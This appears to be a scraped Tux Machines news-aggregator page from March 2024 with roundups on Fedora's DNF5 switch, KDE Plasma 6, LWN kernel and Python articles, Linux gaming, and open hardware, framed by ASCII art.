⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣿⣿⣿⣄⠀⠻⠛⠀⣴⣿⡿⢎⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣬⣍⣫⣴⣶⣶⣆⣛⣫⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ䷩ 𝚕𝚒𝚗𝚎 1431 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Fedora_41_to_Adopt_Next_Gen_DNF5_Package_Manager.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Fedora_41_to_Adopt_Next_Gen_DNF5_Package_Manager.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Fedora 41 to Adopt Next-Gen DNF5 Package Manager⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Arindam Giri on Mar 29, 2024 Fedora, a popular Linux distribution, will use DNF5 as the default package manager in Fedora 41. The move was originally planned for Fedora 39, but it was delayed because the tooling needed was not available. The Fedora developers think that the distribution is ready to be moved, but they still need to add some missing features in future updates. Read_on ䷩ 𝚕𝚒𝚗𝚎 1458 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Free_Libre_and_Open_Source_Software_Leftovers.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Free_Libre_and_Open_Source_Software_Leftovers.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Free, Libre, and Open Source Software Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Medevel ☛ Apache_Superset:_Build_A_Modern,_Enterprise-ready_Business Intelligence_Web_Application⠀⇛ Apache Superset™ is an open-source modern data exploration and visualization platform. * ⚓ Hackaday ☛ Webserver_Runs_On_Android_Phone⠀⇛ Android, the popular mobile phone OS, is essentially just Linux with a nice user interface layer covering it all up. In theory, it should be able to do anything a normal computer running Linux could do. And, since most web servers in the world are running Linux, [PelleMannen] figured his Android phone could run a web server just as well as any other Linux machine and built this webpage that’s currently running on a smartphone, with an additional Reddit post for a little more discussion. * ⚓ Mandaris Moore ☛ Why_does_the_Labarum_theme_not_have_a_header⠀⇛ If you’ve come to my site, you’ve seen it. Or rather, seen that it isn’t there. Most site have them, whether it’s a big banner or image that lets you know that you are on a webpage. I’m referring to the header; usually the first h1 element in the html. Open any book on HTML and it’s one of the top five elements that you learn about. But, if this element is so basic and used so often, then how why do I not use this in my theme? * § Licensing / Legal⠀➾ o ⚓ Silicon Angle ☛ Modular_open-sources_its_Mojo_AI_programming language’s_core_components⠀⇛ Modular Inc. today open-sourced the core components of Mojo, a programming language designed for writing artificial intelligence software. The code is available under a customized version of the Apache 2 license. Modular added modifications designed to make Mojo easier to combine with software distributed under GPL2, another popular open-source license. The highest-profile project that uses GPL2 is the Linux kernel. * § Education⠀➾ o ⚓ Rlang ☛ 6_New_books_added_to_Big_Book_of_R⠀⇛ I’m very happy to announce the addition of 6 new books to the Big Book of R collection, which now stands at about 420 books in total! * § Standards/Consortia⠀➾ o ⚓ Andy Bell ☛ 404_Media_Now_Has_a_Full_Text_RSS_Feed⠀⇛ This is a great example of an organisation navigating the changing landscape of publishing in a good way. The folks 404 Media (a fantastic publication) have invested in both their platform and others using Ghost CMS so people that are paying to read their stuff, get the most convenient delivery method: a full HTML RSS feed. ䷩ 𝚕𝚒𝚗𝚎 1556 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Games_Scary_Picks_Triple_i_Initiative_and_More.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Games_Scary_Picks_Triple_i_Initiative_and_More.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Games: Scary Picks, Triple-i Initiative, and More⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Humble_Spring_Screams_Bundle_has_Amnesia:_The_Bunker_and_My_Friendly Neighborhood⠀⇛ Humble have a pretty good bundle here for those of you who like your games a little bit more on the scary side in the Humble Spring Screams Bundle. * ⚓ The_Triple-i_Initiative_gaming_showcase_is_coming_April_10th⠀⇛ So we finally know what the mysterious Triple-i Initiative thing is! It's a big gaming showcase full of announcements and new footage for upcoming games centred around triple-i games and studios (big indies). * ⚓ Fanatical's_Play_on_the_Go_Bundle_Spring_Edition_plus_a_Humble_Store Handheld_sale_live⠀⇛ Two good chances here for you to fill up on some great games for your Steam Deck this Easter Weekend, as both Fanatical and Humble Store have some good deals doing. * ⚓ Squad-based_online_shooter_Enlisted:_Reinforced_now_on_Steam_with_Linux support⠀⇛ Gaijin Network (War Thunder) and Darkflow Software (CRSED: Cuisine Royale) have today released the online squad-based shooter Enlisted: Reinforced into Early Access on Steam. As they said they would when I covered it previously, the release comes with Native Linux support. * ⚓ Take-Two_Interactive_buying_Gearbox_from_Embracer,_more_Borderlands_on the_way⠀⇛ Embracer Group continue to sell off more with the latest being Gearbox, which has been picked up by Take-Two Interactive in a $460 million deal. * ⚓ PUNKCAKE_Délicieux_just_added_Linux_support_to_a_whole_bunch_of_games⠀⇛ PUNKCAKE Délicieux are a game dev duo that release small fun games around once a month, and they've just now given all of their available titles the Linux (and macOS) treatment. They've made some pretty fun games looking at the list so you may want to go and check out a few of these. ䷩ 𝚕𝚒𝚗𝚎 1630 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/IPFire_Location_On_getting_more_data_for_your_byte.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/IPFire_Location_On_getting_more_data_for_your_byte.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ IPFire Location: On getting more data for your byte⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 After launching IPFire Location, we have gradually been making changes to the way how to aggregate and process our database sources. In fact, we have been adding more sources like Geofeeds that have become hugely popular. With that much data, how are we making sure the database doesn't explode? IPFire Location is a classic Geolocation database. But instead of distributing it as a classic CSV file like many others are doing it, the database is stored in a specially created format. This format is crucial for us, since it allows us to handle the data very easily, search through it very quickly and store it compactly. To understand how, we will need to do a little deep dive into data structures... Read_on ䷩ 𝚕𝚒𝚗𝚎 1664 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/KDE_Plasma_6_Experience_A_Practical_Review.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/KDE_Plasma_6_Experience_A_Practical_Review.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ KDE Plasma 6 Experience: A Practical Review⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Arindam Giri on Mar 29, 2024 I waited a few weeks to get most of the initial bugs are sorted out to do this review. So, I installed the KDE Neon User edition featuring KDE Plasma 6 in an actual physical hardware (not virtual machine) to test its features and performances. This review is not about the Plasma 6 features, which you probably already be aware of. Instead, it is a review from the usage and practicality standpoint for an average user. Read_on ䷩ 𝚕𝚒𝚗𝚎 1695 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Latest_LWN_Articles_Outside_Paywall_Kernel_and_Programming_Focu.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Latest_LWN_Articles_Outside_Paywall_Kernel_and_Programming_Focu.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Latest LWN Articles Outside Paywall: Kernel and Programming Focus⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * § Kernel Space⠀➾ o ⚓ LWN ☛ The_first_half_of_the_6.9_merge_window⠀⇛ As of this writing, just over 4,900 non-merge changesets have been pulled into the mainline for the 6.9 release. This work includes the usual array of changes all over the kernel tree; read on for a summary of the most significant work merged during the first part of the 6.9 merge window. o ⚓ LWN ☛ Toward_a_real_"too_small_to_fail"_rule⠀⇛ Kernel developers have long been told that any attempt to allocate memory might fail, so their code must be prepared for memory to be unavailable. Informally, though, the kernel's memory-management subsystem implements a policy whereby requests below a certain size will not fail (in process context, at least), regardless of how tight memory may be. A recent discussion on the linux-mm list has looked at the idea of making the "too small to fail" rule a policy that developers can rely on. The kernel is unable to use virtual memory, so it is strictly bound by the amount of physical memory in the system. Depending on what sort of workload is running, that memory could be tied up in various ways and unavailable for allocation elsewhere. Allowing allocation requests to fail gives the kernel the freedom to avoid making things worse when memory pressure is high. There are some downsides to failing an allocation request, of course. Whatever operation needed that memory will also be likely to fail, and that failure will probably propagate out to user space, resulting in disgruntled users. There is also a significant chance that the kernel will not handle the allocation failure properly, even if the developers have been properly diligent. Failure paths can be hard to test; many of those paths in the kernel may never have been executed and, as a consequence, many are likely to have bugs. Unwinding an operation halfway through can be a complex business, which is not the kind of task one wants to see entrusted to untested code. * § Python⠀➾ o ⚓ LWN ☛ "Real"_anonymous_functions_for_Python⠀⇛ There are a number of different language-enhancement ideas that crop up with some regularity in the Python community; many of them have been debated and shot down multiple times over the years. When one inevitably arises anew, it can sometimes be difficult to tamp it down, even if it is unlikely that the idea will go any further than the last N times it cropped up. A recent discussion about "real" anonymous functions follows a somewhat predictable path, but there are still reasons to participate in vetting these "new" ideas, despite the tiresome, repetitive nature of the exercise—examples of recurring feature ideas that were eventually adopted definitely exist. At the end of January, Dan D'Avella asked why Python did not have ""real anonymous functions a la JavaScript or Rust"". While Python functions are regular objects that can be assigned to a variable or passed to another function, that is not reflected in the syntax for the language, in his opinion. There is, of course, lambda, ""but its usefulness is quite limited and its syntax is frankly a bit cumbersome"". He wondered if more flexible, full-on anonymous functions had been proposed before, saying that he had not found any PEPs of that nature. * § Rust⠀➾ o ⚓ LWN ☛ Cranelift_code_generation_comes_to_Rust⠀⇛ Cranelift is an Apache-2.0-licensed code-generation backend being developed as part of the Wasmtime runtime for WebAssembly. In October 2023, the Rust project made Cranelift available as an optional component in its nightly toolchain. Users can now use Cranelift as the code-generation backend for debug builds of projects written in Rust, making it an opportune time to look at what makes Cranelift different. Cranelift is designed to compete with existing compilers by generating code more quickly than they can, thanks to a stripped-down design that prioritizes only the most important optimizations. Fast compiler times are one of the many things that users want from their programming languages. Compile times have been a source of complaints about Rust (and other languages that use LLVM) for some time, despite continuing steady progress by the Rust and LLVM projects. Additionally, a compiler that produces code quickly enough is potentially viable in applications where it currently makes more sense to use an interpreter. All of these factors are cause to think that a compiler that focuses on speed of compilation, rather than the speed of the produced code, could be valuable. ䷩ 𝚕𝚒𝚗𝚎 1829 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Microsoft_and_Plagiarism_in_Your_Face.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Microsoft_and_Plagiarism_in_Your_Face.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Microsoft and Plagiarism (in Your Face)⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Joey Hess ☛ the_vulture_in_the_coal_mine⠀⇛ Turns out that VPS provider Vultr's terms of service were quietly changed some time ago to give them a "perpetual, irrevocable" license to use content hosted there in any way, including modifying it and commercializing it "for purposes of providing the Services to you." This is very similar to changes that Github made to their TOS in 2017. Since then, Github has been rebranded as "The world's leading AI-powered developer platform". The language in their TOS now clearly lets them use content stored in Github for training AI. (Probably this is their second line of defense if the current attempt to legitimise copyright laundering via generative AI fails.) Vultr is currently in damage control mode, accusing their concerned customers of spreading "conspiracy theories" (- - founder David Aninowsky) and updating the TOS to remove some of the problem language. Although it still allows them to "make derivative works", so could still allow their AI division to scrape VPS images for training data. * ⚓ TechSpot ☛ Microsoft_is_quietly_installing_the_Copilot_app_on_Windows PCs [Ed: To FAKE usage levels]⠀⇛ The big picture: Microsoft launched a dedicated Copilot app for Android last December that offers chatbot-like capabilities, similar to what you would get from ChatGPT. While the company has yet to launch an official Copilot app for Windows, latest developments suggest that Redmond is working on bringing its AI software to the desktop sooner rather than later. ䷩ 𝚕𝚒𝚗𝚎 1885 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Open_Hardware_Arduino_Raspberry_Pi_SparkFun_and_More.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Open_Hardware_Arduino_Raspberry_Pi_SparkFun_and_More.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Open Hardware: Arduino, Raspberry Pi, SparkFun, and More⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Computers Are Bad ☛ 2024-03-27_telephone_cables⠀⇛ So let's say you're working on a household project and need around a dozen telephone cables---the ordinary kind that you would use between your telephone and the wall. It is, of course, more cost effective to buy bulk cable, or simply a long cable, and cut it to length and attach jacks yourself. This is even mercifully easy for telephone cable, as the wires come out of the flat cable jacket in the same order they go into the modular connector. No fiddly straightening and rearranging, you can just cut off the jacket and shove it into the jack. But, wait, what's up with that whole thing anyway? and are telephone cables really as simple as stripping the jacket and shoving them in? * ⚓ Arduino ☛ This_small_scorekeeping_air_hockey_game_brings_the_arcade classic_to_your_tabletop⠀⇛ The key to air hockey is right there in the name: air. All of those little holes in the table’s surface allow air flow. That creates an air cushion for the puck and paddles to float on, reducing friction and enabling knuckle-shattering gameplay. For that to work, the table needs something pushing at least as much air as escapes through the holes. This table isn’t very big, so it doesn’t need a high volume of air. Three 12V PC fans are enough. They push air into a chamber beneath the hole- filled top board. Power for the fans comes from a battery holder with 8 AA batteries. * ⚓ Arduino ☛ Don’t_ignore_single-axis_joysticks⠀⇛ Allen’s device controls three different things with its three single-axis joysticks: an RGB LED, a servo motor, and a stepper motor. Each of those is an example of a single-axis at work. That axis maps to color (red and green) and brightness for the LED, horn position for the servo, and rotation direction/speed for the stepper motor. There are, of course, several other viable use cases for single-axis joysticks. * ⚓ Frank Delporte ☛ Review_of_the_Elecrow_Raspberry_Pi_Pico_Advanced_Kit⠀⇛ People who follow me, know I’m a big fan of the Elecrow CrowPi, the little suitcase with a Raspberry Pi and a lot of electronic components included. I used it already a lot in my presentations at various conferences to demonstrate #JavaOnRaspberryPi. Recently, Elecrow sent me a “Raspberry Pi Pico Advanced Kit” for free, to test and evaluate it. It’s a plastic box with 32 modules, a smart car kit, breadboards, wires, and a Pico to get started quickly with electronic experiments. * ⚓ Raspberry Pi ☛ Mini_Observatory_|_The_MagPi_#140⠀⇛ The project provided a great learning experience, with the observatory, gears and mechanism all home-grown. The ‘semi- intelligent’ motor controller for the telescope is probably the most novel element. Matt needed a way for the telescope to move while Raspberry Pi was busy taking photographs, so gave the motors a little RP2040 microprocessor brain. “They were released at the perfect time.” Matt was able to make use of Python packages such as Skyfield, OpenCV, PiDNG and Astroalign and says it was a good choice for his Mini Observatory project. He is also really keen to process the photographs in real time onboard the telescope. “I haven’t solved that yet, so I still need to do some offline processing afterwards. Realtime processing must be possible, I just have to research more.” * ⚓ SparkFun Electronics ☛ 2024-03-26_[Older]_Science_History_is_Women's History⠀⇛ * ⚓ SparkFun Electronics ☛ 2024-03-22_[Older]_Go_Global_(for_Less!)_with SparkFun's_New_Budget-Friendly_GNSS⠀⇛ ䷩ 𝚕𝚒𝚗𝚎 1994 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Open_Hardware_Purism_Raspberry_Pi_NES.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Open_Hardware_Purism_Raspberry_Pi_NES.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Open Hardware: Purism, Raspberry Pi, NES⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Raspberry_Fruit⦈_ * ⚓ Purism ☛ Purism_Differentiator_Series,_Part_8:_Big_Tech_Avoidance⠀⇛ We avoid operating systems from Big Tech obviously by using PureOS by default for nearly all our hardware and services. We avoid Big Tech software and applications for any core business function and we release all our source code of everything we author. * ⚓ Tom's Hardware ☛ We_tried_to_install_backdoored_Windows_11_on_Raspberry Pi_5_—_lack_of_internet_connectivity_left_us_stuck⠀⇛ The latest flagship Raspberry Pi 5 receives the traditional "Can I run Windows?" treatment, and this time it put us through the wringer * ⚓ Raspberry Pi ☛ Our_new_theory_of_change⠀⇛ We are excited to launch a newly refreshed theory of change that describes how we pursue our mission to support young people. Find out more. * ⚓ Tom's Hardware ☛ Modder_morphs_NES_cartridge_into_a_working_console that_plays_other_NES_games_—_and_itself⠀⇛ Using the empty space available inside an original NES game cartridge, YouTuber James Channel turns a copy of NES Open Tournament Golf into a full working Nintendo Entertainment System, complete with cartridge slot and 2 controller ports. * ⚓ Hackaday ☛ Retrogadgets:_Butler_In_A_Box⠀⇛ You walk into your house and issue a voice command to bring up the lights and start a cup of coffee. No big deal, right? Siri, Google, and Alexa can do all that. Did we mention it is 1985? And, apparently, you were one of the people who put out about $1,500 for a Mastervoice “Butler in a Box,” the subject of a Popular Science video you can see below. ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⢤⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣾⣿⣿⡧⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿⣿⣿⣿⣿⠂⠀⡀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⡇⠈⠀⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡁⠀⠀⢸⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⠅⠂⢐⣙⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣽⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡿⠿⠿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠛⠛⠛⠛⠛⠻⠿⠿⣷⣤⣤⣤⣤⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣤⣤⡶⠖⠚⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⠤⠤⢤⣤⣀⠠⠤⣒⣒⣒⠦⢤⡀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠈⠉⠻⣿⣿⣿⣿⣿⣿⣿⣶⣦⣄⣀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣶⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠒⠉⠉⠉⠉⠁⠐⠞⣋⣥⣤⣴⣦⠀⢹⡿⠀⠈⣻⣿⣿⣿⡦⠁⠀⠀⠀⣰⣿⣧⠀⠀⠐⠒⢤⡀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⡀⠀⣠⣬⣿⣿⠀⢠⣾⣿⣿⣿⣿⣿⣷⠀⠇⠀⢀⣩⣭⣍⣡⣾⣿⣷⣶⣤⣿⣿⡿⠀⣀⣶⣿⣦⡙⠆⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⢀⣀⣤⣴⣶⣾⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣤⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⣩⡉⠉⠉⠉⠉⣋⣛⡿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠁⠀⠀⠀⠀⠀⠀ 